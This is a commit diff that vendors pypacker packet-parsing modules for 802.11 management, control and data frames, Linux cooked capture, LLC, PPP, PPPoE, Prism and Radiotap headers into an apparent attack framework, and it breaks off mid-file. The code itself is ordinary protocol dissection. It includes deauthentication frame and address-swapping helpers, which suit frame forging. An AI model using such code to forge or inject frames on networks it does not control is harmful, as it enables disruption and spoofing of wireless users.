+	def _get_protected(self):
+		return (self.framectl & _PROTECTED_MASK) >> _PROTECTED_SHIFT
+
+	def _set_protected(self, val):
+		self.framectl = (val << _PROTECTED_SHIFT) | (self.framectl & ~_PROTECTED_MASK)
+
+	def _get_order(self):
+		return (self.framectl & _ORDER_MASK) >> _ORDER_SHIFT
+
+	def _set_order(self, val):
+		self.framectl = (val << _ORDER_SHIFT) | (self.framectl & ~_ORDER_MASK)
+
+	version = property(_get_version, _set_version)
+	type = property(_get_type, _set_type)
+	subtype = property(_get_subtype, _set_subtype)
+	to_ds = property(_get_to_ds, _set_to_ds)
+	from_ds = property(_get_from_ds, _set_from_ds)
+	more_frag = property(_get_more_frag, _set_more_frag)
+	retry = property(_get_retry, _set_retry)
+	pwr_mgt = property(_get_pwr_mgt, _set_pwr_mgt)
+	more_data = property(_get_more_data, _set_more_data)
+	protected = property(_get_protected, _set_protected)
+	order = property(_get_order, _set_order)
+	from_to_ds = property(_get_from_to_ds)
+
+	def _dissect(self, buf):
+		self.framectl = struct.unpack(">H", buf[0:2])[0]
+
+		# logger.debug("got protected packet, type/sub/prot: %d/%d/%d" %
+		# (TYPE_FACTORS[self.type], self.subtype, protected_factor))
+		# logger.debug("ieee80211 type/subtype is: %d/%d" % (self.type, self.subtype))
+		self._init_handler(TYPE_FACTORS[self.type] + self.subtype, buf[4:])
+		return 4
+
+	#
+	# mgmt frames
+	#
+	class Beacon(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			# 12 Bits: 0->4095 | 4 Bits
+			# SF SS (LE)
+			("seq_frag", "H", 0),
+			# _ts (integer) is saved as LE
+			("_ts", "Q", 0),
+			("interval", "H", 0x6400),
+			("capa", "H", 0x0100),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		def _get_seq(self):
+			return (self.seq_frag & 0xFF) << 4 | (self.seq_frag >> 12)
+
+		def _set_seq(self, val):
+			self.seq_frag = (val & 0xF) << 12 | (val & 0xFF0) >> 4 | (self.seq_frag & 0x0F00)
+
+		def _get_ts(self):
+			# LE->BE: dirty but simple
+			return struct.unpack("<Q", struct.pack(">Q", self._ts))[0]
+
+		def _set_ts(self, val):
+			self._ts = struct.unpack("<Q", struct.pack(">Q", val))[0]
+
+		seq = property(_get_seq, _set_seq)
+		ts = property(_get_ts, _set_ts)
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[32:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Action(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("category", "B", 0),
+			("code", "B", 0)
+		)
+
+		class BlockAckRequest(pypacker.Packet):
+			__hdr__ = (
+				("dialog", "B", 0),
+				("parameters", "H", 0),
+				("timeout", "H", 0),
+				("starting_seq", "H", 0),
+			)
+
+		class BlockAckResponse(pypacker.Packet):
+			__hdr__ = (
+				("dialog", "B", 0),
+				("status_code", "H", 0),
+				("parameters", "H", 0),
+				("timeout", "H", 0),
+			)
+
+		CATEGORY_BLOCK_ACK	= 3
+		CODE_BLOCK_ACK_REQUEST	= 0
+		CODE_BLOCK_ACK_RESPONSE	= 1
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+		bssid_s = pypacker.get_property_mac("bssid")
+
+		def _dissect(self, buf):
+			# logger.debug(">>>>>>>> ACTION!!!")
+			# category: block ack, code: request or response
+			self._init_handler(buf[20] * 4 + buf[21], buf[22:])
+			return 22
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class ProbeReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[20:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class ProbeResp(Beacon):
+		pass
+
+	class AssocReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("capa", "H", 0),
+			("interval", "H", 0),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[24:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class AssocResp(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("capa", "H", 0),
+			("status", "H", 0),
+			("aid", "H", 0),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[26:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Disassoc(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("reason", "H", 0),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class ReassocReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("capa", "H", 0),
+			("interval", "H", 0),
+			("current_ap", "6s", b"\x00" * 6)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Auth(pypacker.Packet):
+		"""Authentication request."""
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("algo", "H", 0),
+			("seq", "H", 0x0100),
+			("status", "H", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Deauth(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("reason", "H", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	m_decoder = {
+		M_BEACON	: Beacon,
+		M_ACTION	: Action,
+		M_ASSOC_REQ	: AssocReq,
+		M_ASSOC_RESP	: AssocResp,
+		M_DISASSOC	: Disassoc,
+		M_REASSOC_REQ	: ReassocReq,
+		M_REASSOC_RESP	: AssocResp,
+		M_AUTH		: Auth,
+		M_PROBE_REQ	: ProbeReq,
+		M_PROBE_RESP	: ProbeResp,
+		M_DEAUTH	: Deauth
+	}
+
+	#
+	# Control frames: no need for extra layer: 802.11 Base data is enough
+	#
+
+	class RTS(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class CTS(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+
+	class ACK(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+
+	class BlockAckReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("reqctrl", "H", 0),
+			("seq", "H", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class BlockAck(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("reqctrl", "H", 0),
+			("seq", "H", 0),
+			("bitmap", "Q", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class CFEnd(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	c_decoder = {
+		C_RTS		: RTS,
+		C_CTS		: CTS,
+		C_ACK		: ACK,
+		C_BLOCK_ACK_REQ	: BlockAckReq,
+		C_BLOCK_ACK	: BlockAck,
+		C_CF_END	: CFEnd
+	}
+
+	#
+	# data frames
+	#
+	class Dataframe(pypacker.Packet):
+		"""
+		DataFrames need special care: there are too many types of field combinations to create classes
+		for every one. Solution: initiate giving lower type "subType" via constructor.
+		In order to use "src/dst/bssid" instead of addrX set from_to_ds of "subType" to one of the following values:
+
+		[Bit 0: from DS][Bit 1: to DS] = [order of fields]
+
+		00 = 0 = dst, src, bssid
+		01 = 1 = bssid, src, dst
+		10 = 2 = dst, bssid, src
+		11 = 3 = RA, TA, DA, SA
+		"""
+		def __init__(self, *arg, **kwargs):
+			if len(arg) > 1:
+				# logger.debug("extracting lower layer type: %r" % arg[1])
+				self.dtype = arg[1]
+			else:
+				self.dtype = self
+			super().__init__(*arg, **kwargs)
+
+		__hdr__ = (
+			("addr1", "6s", b"\x00" * 6),
+			("addr2", "6s", b"\x00" * 6),
+			("addr3", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("addr4", "6s", None),		# to/from-DS = 1
+			("qos_ctrl", "H", 0),		# QoS
+			("sec_param", "Q", 0)		# protected
+		)
+
+		def reverse_address(self):
+			if self.dtype.from_to_ds == 0:
+				self.addr1, self.addr2 = self.addr2, self.addr1
+			elif self.dtype.from_to_ds == 1:
+				self.addr2, self.addr3 = self.addr3, self.addr2
+			elif self.dtype.from_to_ds == 2:
+				self.addr1, self.addr3 = self.addr3, self.addr1
+
+		# FromDs, ToDS
+		# 00 = dst, src, bssid
+		# 01 = bssid, src, dst
+		# 10 = dst, bssid, src
+		# 11 = RA, TA, DA, SA
+
+		def __get_src(self):
+			return self.addr2 if self.dtype.from_to_ds in [0, 1] else self.addr3
+
+		def __set_src(self, src):
+			if self.dtype.from_to_ds in [0, 1]:
+				self.addr2 = src
+			else:
+				self.addr3 = src
+
+		def __get_dst(self):
+			return self.addr1 if self.dtype.from_to_ds in [0, 2] else self.addr3
+
+		def __set_dst(self, dst):
+			if self.dtype.from_to_ds in [0, 2]:
+				self.addr1 = dst
+			else:
+				self.addr3 = dst
+
+		def __get_bssid(self):
+			dstype = self.dtype.from_to_ds
+
+			if dstype == 0:
+				return self.addr3
+			elif dstype == 1:
+				return self.addr1
+			elif dstype == 2:
+				return self.addr2
+
+		def __set_bssid(self, bssid):
+			dstype = self.dtype.from_to_ds
+			if dstype == 0:
+				self.addr3 = bssid
+			elif dstype == 1:
+				self.addr1 = bssid
+			elif dstype == 2:
+				self.addr2 = bssid
+
+		src = property(__get_src, __set_src)
+		src_s = pypacker.get_property_mac("src")
+		dst = property(__get_dst, __set_dst)
+		dst_s = pypacker.get_property_mac("dst")
+		bssid = property(__get_bssid, __set_bssid)
+		bssid_s = pypacker.get_property_mac("bssid")
+
+		__QOS_SUBTYPES = set([8, 9, 10, 11, 12, 14, 15])
+
+		def _dissect(self, buf):
+			# logger.debug("starting dissecting, buflen: %r" % str(buf))
+			header_len = 30
+
+			try:
+				is_qos = True if self.dtype.subtype in IEEE80211.Dataframe.__QOS_SUBTYPES else False
+				is_protected = self.dtype.protected == 1
+				is_bridge = True if self.dtype.from_ds == 1 and self.dtype.to_ds == 1 else False
+			except Exception:
+				# logger.debug(e)
+				# default is fromds
+				is_qos = False
+				is_protected = False
+				is_bridge = False
+
+			# logger.debug("switching fields1")
+			if not is_qos:
+				self.qos_ctrl = None
+				header_len -= 2
+			# logger.debug("switching fields2")
+			if not is_protected:
+				self.sec_param = None
+				header_len -= 8
+			# logger.debug("switching fields3")
+			if is_bridge:
+				self.addr4 = b"\x00" * 6
+				header_len += 6
+			# logger.debug("format/length/len(bin): %s/%d/%d" % (self._hdr_fmtstr, self.hdr_len, len(self.bin())))
+			# logger.debug("%r" % self)
+			return header_len
+
+	d_decoder = {
+		D_NORMAL		: Dataframe,
+		D_DATA_CF_ACK		: Dataframe,
+		D_DATA_CF_POLL 		: Dataframe,
+		D_DATA_CF_ACK_POLL 	: Dataframe,
+		D_NULL			: Dataframe,
+		D_CF_ACK		: Dataframe,
+		D_CF_POLL		: Dataframe,
+		D_CF_ACK_POLL		: Dataframe,
+		D_QOS_DATA		: Dataframe,
+		D_QOS_CF_ACK		: Dataframe,
+		D_QOS_CF_POLL		: Dataframe,
+		D_QOS_CF_ACK_POLL	: Dataframe,
+		D_QOS_NULL		: Dataframe,
+		D_QOS_CF_POLL_EMPTY	: Dataframe
+	}
+
+	#
+	# IEs for Mgmt-Frames
+	#
+	@staticmethod
+	def _unpack_ies(buf):
+		"""Parse IEs and return them as Triggerlist."""
+		# each IE starts with an ID and a length
+		ies = []
+		off = 0
+		buflen = len(buf)
+		# logger.debug("lazy dissecting: %s" % buf)
+
+		while off < buflen:
+			ie_id = buf[off]
+			try:
+				parser = IEEE80211.ie_decoder[ie_id]
+			except KeyError:
+				# some unknown tag, use standard format
+				parser = IEEE80211.IE
+
+			dlen = buf[off + 1]
+			# logger.debug("IE parser is: %d = %s = %s" % (ie_id, parser, buf[off: off+2+dlen]))
+			ie = parser(buf[off: off + 2 + dlen])
+			ies.append(ie)
+			off += 2 + dlen
+
+		return ies
+
+	class IE(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0)
+		)
+
+	class FH(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("tu", "H", 0),
+			("hopset", "B", 0),
+			("hoppattern", "B", 0),
+			("hopindex", "B", 0)
+		)
+
+	class DS(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("ch", "B", 0)
+		)
+
+	class CF(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("count", "B", 0),
+			("period", "B", 0),
+			("max", "H", 0),
+			("dur", "H", 0)
+		)
+
+	class TIM(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("count", "B", 0),
+			("period", "B", 0),
+			("ctrl", "H", 0)
+		)
+
+	class IBSS(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("atim", "H", 0)
+		)
+
+	# IEs
+	IE_SSID			= 0
+	IE_RATES		= 1
+	IE_FH			= 2
+	IE_DS			= 3
+	IE_CF			= 4
+	IE_TIM			= 5
+	IE_IBSS			= 6
+	IE_HT_CAPA		= 45
+	IE_ESR			= 50
+	IE_HT_INFO		= 61
+
+	ie_decoder = {
+		IE_SSID		: IE,
+		IE_RATES	: IE,
+		IE_FH		: FH,
+		IE_DS		: DS,
+		IE_CF		: CF,
+		IE_TIM		: TIM,
+		IE_IBSS		: IBSS,
+		IE_HT_CAPA	: IE,
+		IE_ESR		: IE,
+		IE_HT_INFO	: IE
+	}
+
+
+# handler for IEEE80211
+# position in list = type-ID
+dicts			= [IEEE80211.m_decoder, IEEE80211.c_decoder, IEEE80211.d_decoder]
+decoder_dict_complete	= {}
+
+for pos, decoder_dict in enumerate(dicts):
+	for key, val in decoder_dict.items():
+		# same subtype-ID for different typ-IDs, distinguish via "type_factor + subtype)"
+		decoder_dict_complete[TYPE_FACTORS[pos] + key] = val
+
+pypacker.Packet.load_handler(IEEE80211, decoder_dict_complete)
+
+# handler for Action
+CATEGORY_BLOCK_ACK_FACTOR = IEEE80211.Action.CATEGORY_BLOCK_ACK * 4
+pypacker.Packet.load_handler(IEEE80211.Action,
+	{
+		CATEGORY_BLOCK_ACK_FACTOR + IEEE80211.Action.CODE_BLOCK_ACK_REQUEST: IEEE80211.Action.BlockAckRequest,
+		CATEGORY_BLOCK_ACK_FACTOR + IEEE80211.Action.CODE_BLOCK_ACK_RESPONSE: IEEE80211.Action.BlockAckResponse
+	}
+)

+ 78 - 0
attack_framework/pypacker/layer12/linuxcc.py

@@ -0,0 +1,78 @@
+"""
+Linux cooked capture format
+"""
+
+from pypacker import pypacker
+
+import logging
+import struct
+
+# avoid unneeded references for performance reasons
+pack = struct.pack
+unpack = struct.unpack
+
+logger = logging.getLogger("pypacker")
+
+# Ethernet payload types - http://standards.ieee.org/regauth/ethertype
+LCC_TYPE_PUP		= 0x0200		# PUP protocol
+LCC_TYPE_IP		= 0x0800		# IPv4 protocol
+LCC_TYPE_ARP		= 0x0806		# address resolution protocol
+LCC_TYPE_WOL		= 0x0842		# Wake on LAN
+LCC_TYPE_CDP		= 0x2000		# Cisco Discovery Protocol
+LCC_TYPE_DTP		= 0x2004		# Cisco Dynamic Trunking Protocol
+LCC_TYPE_REVARP		= 0x8035		# reverse addr resolution protocol
+LCC_TYPE_ETHTALK	= 0x809B		# Apple Talk
+LCC_TYPE_AARP		= 0x80F3		# Appletalk Address Resolution Protocol
+LCC_TYPE_8021Q		= 0x8100		# IEEE 802.1Q VLAN tagging
+LCC_TYPE_IPX		= 0x8137		# Internetwork Packet Exchange
+LCC_TYPE_NOV		= 0x8138		# Novell
+LCC_TYPE_IP6		= 0x86DD		# IPv6 protocol
+LCC_TYPE_MPLS_UCAST	= 0x8847		# MPLS unicast
+LCC_TYPE_MPLS_MCAST	= 0x8848		# MPLS multicast
+LCC_TYPE_PPOE_DISC	= 0x8863		# PPPoE Discovery
+LCC_TYPE_PPOE_SESS	= 0x8864		# PPPoE Session
+LCC_TYPE_JUMBOF		= 0x8870		# Jumbo Frames
+LCC_TYPE_PROFINET	= 0x8892		# Realtime-Ethernet PROFINET
+LCC_TYPE_ATAOE		= 0x88A2		# ATA other Ethernet
+LCC_TYPE_ETHERCAT	= 0x88A4		# Realtime-Ethernet Ethercat
+LCC_TYPE_PBRIDGE	= 0x88A8		# Provider Briding
+LCC_TYPE_POWERLINK	= 0x88AB		# Realtime Ethernet POWERLINK
+LCC_TYPE_LLDP		= 0x88CC		# Link Layer Discovery Protocol
+LCC_TYPE_SERCOS		= 0x88CD		# Realtime Ethernet SERCOS III
+LCC_TYPE_FIBRE_ETH	= 0x8906		# Fibre Channel over Ethernet
+LCC_TYPE_FCOE		= 0x8914		# FCoE Initialization Protocol (FIP)
+
+PACKET_DIR_TO_US	= 0
+PACKET_DIR_FROM_US	= 4
+
+
+class LinuxCC(pypacker.Packet):
+	__hdr__ = (
+		("dir", "H", 4),
+		("addrtype", "H", 0),
+		("addrlen", "H", 0),
+		("info", "Q", 0),		# TODO: Q available?
+		("type", "H", LCC_TYPE_IP)
+	)
+
+	def _dissect(self, buf):
+		htype = unpack(">H", buf[14: 16])[0]
+		# logger.debug("type: %X" % type)
+		self._init_handler(htype, buf[16:])
+		return 16
+
+# load handler
+from pypacker.layer12 import arp, dtp, pppoe
+from pypacker.layer3 import ip, ip6, ipx
+
+pypacker.Packet.load_handler(LinuxCC,
+	{
+		LCC_TYPE_IP: ip.IP,
+		LCC_TYPE_ARP: arp.ARP,
+		LCC_TYPE_DTP: dtp.DTP,
+		LCC_TYPE_IPX: ipx.IPX,
+		LCC_TYPE_IP6: ip6.IP6,
+		LCC_TYPE_PPOE_DISC: pppoe.PPPoE,
+		LCC_TYPE_PPOE_SESS: pppoe.PPPoE
+	}
+)

+ 39 - 0
attack_framework/pypacker/layer12/llc.py

@@ -0,0 +1,39 @@
+from pypacker import pypacker
+import struct
+
+LLC_TYPE_IP		= 0x0800		# IPv4 protocol
+LLC_TYPE_ARP		= 0x0806		# address resolution protocol
+LLC_TYPE_IP6		= 0x86DD		# IPv6 protocol
+
+
+class LLC(pypacker.Packet):
+	__hdr__ = (
+		("dsap", "B", 0),
+		("ssap", "B", 0),
+		("ctrl", "B", 0),
+		("snap", "5s", b"\x00" * 5),
+	)
+
+	def _dissect(self, buf):
+		# dsap = struct.unpack("B", buf[0])[0]
+
+		if buf[0] == 170:		# = 0xAA
+			# SNAP is following ctrl
+			htype = struct.unpack("H", buf[5:7])[0]
+			self._init_handler(htype, buf[8:])
+		else:
+			# deactivate SNAP
+			self.snap = None
+		return 8
+
+# load handler
+from pypacker.layer12 import arp
+from pypacker.layer3 import ip, ip6
+
+pypacker.Packet.load_handler(LLC,
+	{
+		LLC_TYPE_IP: ip.IP,
+		LLC_TYPE_ARP: arp.ARP,
+		LLC_TYPE_IP6: ip6.IP6,
+	}
+)

+ 44 - 0
attack_framework/pypacker/layer12/ppp.py

@@ -0,0 +1,44 @@
+"""Point-to-Point Protocol."""
+
+from pypacker import pypacker, triggerlist
+
+import logging
+import struct
+
+logger = logging.getLogger("pypacker")
+
+# http://www.iana.org/assignments/ppp-numbers
+PPP_IP	= 0x21		# Internet Protocol
+PPP_IP6 = 0x57		# Internet Protocol v6
+
+# Protocol field compression
+PFC_BIT	= 0x01
+
+
+class PPP(pypacker.Packet):
+	__hdr__ = (
+		("p", None, triggerlist.TriggerList),
+	)
+
+	def _dissect(self, buf):
+		offset = 1
+		ppp_type = buf[0]
+
+		if buf[0] & PFC_BIT == 0:
+			ppp_type = struct.unpack(">H", buf[:2])[0]
+			offset = 2
+			self.p.append(buf[0:2])
+		else:
+			self.p.append(buf[0:1])
+		self._init_handler(ppp_type, buf[offset:])
+		return offset
+
+# load handler
+from pypacker.layer3 import ip, ip6
+
+pypacker.Packet.load_handler(PPP,
+	{
+		PPP_IP: ip.IP,
+		PPP_IP6: ip6.IP6
+	}
+)

+ 49 - 0
attack_framework/pypacker/layer12/pppoe.py

@@ -0,0 +1,49 @@
+"""PPP-over-Ethernet."""
+
+from pypacker import pypacker
+from pypacker.layer12.ppp import PPP
+
+import struct
+
+# RFC 2516 codes
+PPPoE_PADI	= 0x09
+PPPoE_PADO	= 0x07
+PPPoE_PADR	= 0x19
+PPPoE_PADS	= 0x65
+PPPoE_PADT	= 0xA7
+PPPoE_SESSION	= 0x00
+
+
+class PPPoE(pypacker.Packet):
+	__hdr__ = (
+		("v_type", "B", 0x11),
+		("code", "B", 0),
+		("session", "H", 0),
+		("len", "H", 0)		# payload length
+	)
+
+	def __get_v(self):
+		return self.v_type >> 4
+
+	def __set_v(self, v):
+		self.v_type = (v << 4) | (self.v_type & 0xf)
+	v = property(__get_v, __set_v)
+
+	def __get_type(self):
+		return self.v_type & 0xf
+
+	def __set_type(self, t):
+		self.v_type = (self.v_type & 0xf0) | t
+	type = property(__get_type, __set_type)
+
+	def _dissect(self, buf):
+		code = buf[1]
+		if code == PPPoE_SESSION:
+			try:
+				self._set_bodyhandler(PPP(buf[6:]))
+			except (KeyError, struct.error, pypacker.UnpackError):
+				pass
+		else:
+			pass
+		return 6
+# XXX - TODO TLVs, etc.

+ 62 - 0
attack_framework/pypacker/layer12/prism.py

@@ -0,0 +1,62 @@
+"""
+Prism header.
+This packet type exists just for convenience. Radiotap should be prefered over prism
+because of its superior flexibility. Only use this if there is no support for Radiotap
+eg for some Broadcom-Chipsets (stop buying crap man).
+"""
+
+from pypacker import pypacker, triggerlist
+
+import logging
+
+logger = logging.getLogger("pypacker")
+
+
+PRISM_TYPE_80211	= 0
+PRISM_DID_RSSI		= 0x41400000
+
+
+class Did(pypacker.Packet):
+	__hdr__ = (
+		("id", "I", 0),
+		("status", "H", 0),
+		("len", "H", 0),
+		("value", "I", 0),
+	)
+
+	__byte_order__ = "<"
+
+
+class Prism(pypacker.Packet):
+	__hdr__ = (
+		("code", "I", 0),
+		("len", "I", 144),
+		("dev", "16s", b"\x00" * 16),
+		("dids", None, triggerlist.TriggerList),
+	)
+
+	def _dissect(self, buf):
+		off = 24
+		# assume 10 DIDs, 24 + 10*12 = 144 bytes prism header
+		end = off + 10 * 12
+
+		dids = []
+
+		while off < end:
+			did = Did(buf[off:off + 12])
+			dids.append(did)
+			off += 12
+
+		self.dids.extend(dids)
+		self._init_handler(PRISM_TYPE_80211, buf)
+		return off
+
+
+# load handler
+from pypacker.layer12 import ieee80211
+
+pypacker.Packet.load_handler(Prism,
+	{
+		PRISM_TYPE_80211: ieee80211.IEEE80211
+	}
+)

+ 191 - 0
attack_framework/pypacker/layer12/radiotap.py

@@ -0,0 +1,191 @@
+"""Radiotap"""
+from pypacker import pypacker, triggerlist
+import struct
+import logging
+
+logger = logging.getLogger("pypacker")
+
+RTAP_TYPE_80211 = 0
+
+# Ref: http://www.radiotap.org
+# Fields Ref: http://www.radiotap.org/defined-fields/all
+
+# defined flags ordered by appearance (big endian)
+TSFT_MASK		= 0x01000000
+FLAGS_MASK		= 0x02000000
+RATE_MASK		= 0x04000000
+CHANNEL_MASK		= 0x08000000
+
+FHSS_MASK		= 0x10000000
+DB_ANT_SIG_MASK		= 0x20000000
+DB_ANT_NOISE_MASK	= 0x40000000
+LOCK_QUAL_MASK		= 0x80000000
+
+TX_ATTN_MASK		= 0x00010000
+DB_TX_ATTN_MASK		= 0x00020000
+DBM_TX_POWER_MASK	= 0x00040000
+ANTENNA_MASK		= 0x00080000
+
+ANT_SIG_MASK		= 0x00100000
+ANT_NOISE_MASK		= 0x00200000
+RX_FLAGS_MASK		= 0x00400000
+
+CHANNELPLUS_MASK	= 0x00000400
+HT_MASK			= 0x00000800
+
+AMPDU_MASK		= 0x00001000
+VHT_MASK		= 0x00002000
+
+# 7 bits reserved
+
+RT_NS_NEXT_MASK		= 0x00000020
+VENDOR_NS_NEXT		= 0x00000040
+EXT_MASK		= 0x00000080
+
+# mask -> (length, alignment)
+RADIO_FIELDS = {
+	TSFT_MASK		: (8, 8),
+	FLAGS_MASK		: (1, 1),
+	RATE_MASK		: (1, 1),
+	# channel + flags
+	CHANNEL_MASK		: (4, 2),
+
+	# fhss + pattern
+	FHSS_MASK		: (2, 1),
+	DB_ANT_SIG_MASK 	: (1, 1),
+	DB_ANT_NOISE_MASK	: (1, 1),
+	LOCK_QUAL_MASK 		: (2, 2),
+
+	TX_ATTN_MASK		: (2, 2),
+	DB_TX_ATTN_MASK 	: (2, 2),
+	DBM_TX_POWER_MASK 	: (1, 1),
+	ANTENNA_MASK		: (1, 1),
+
+	ANT_SIG_MASK 		: (1, 1),
+	ANT_NOISE_MASK		: (1, 1),
+	RX_FLAGS_MASK 		: (2, 2),
+
+	# CHANNELPLUS_MASK	:,
+	HT_MASK			: (3, 1),
+
+	AMPDU_MASK		: (8, 4),
+	VHT_MASK		: (12, 2)
+
+	# RT_NS_NEXT_MASK	:,
+	# VENDOR_NS_NEXT	:,
+	# EXT_MASK		:
+}
+
+RADIO_FIELDS_MASKS = [
+	TSFT_MASK,
+	FLAGS_MASK,
+	RATE_MASK,
+	# channel + flags
+	CHANNEL_MASK,
+
+	# fhss + pattern
+	FHSS_MASK,
+	DB_ANT_SIG_MASK,
+	DB_ANT_NOISE_MASK,
+	LOCK_QUAL_MASK,
+
+	TX_ATTN_MASK,
+	DB_TX_ATTN_MASK,
+	DBM_TX_POWER_MASK,
+	ANTENNA_MASK,
+
+	ANT_SIG_MASK,
+	ANT_NOISE_MASK,
+	RX_FLAGS_MASK,
+
+	HT_MASK,
+
+	AMPDU_MASK,
+	VHT_MASK
+]
+
+class FlagTriggerList(triggerlist.TriggerList):
+	# no __init__ needed: we just add tuples
+	def _pack(self):
+		return b"".join([flag[1] for flag in self])
+
+
+def get_channelinfo(channel_bytes):
+	"""
+	return -- [channel_mhz, channel_flags]
+	"""
+	return [struct.unpack("<H", channel_bytes[0:2])[0], struct.unpack("<H", channel_bytes[2:4])[0]]
+
+
+class Radiotap(pypacker.Packet):
+	__hdr__ = (
+		("version", "B", 0),
+		("pad", "B", 0),
+		("len", "H", 0x0800),
+		("present_flags", "I", 0),
+		("flags", None, FlagTriggerList)		# stores: (XXX_MASK, value)
+	)
+
+	# handle frame check sequence
+	def __get_fcs(self):
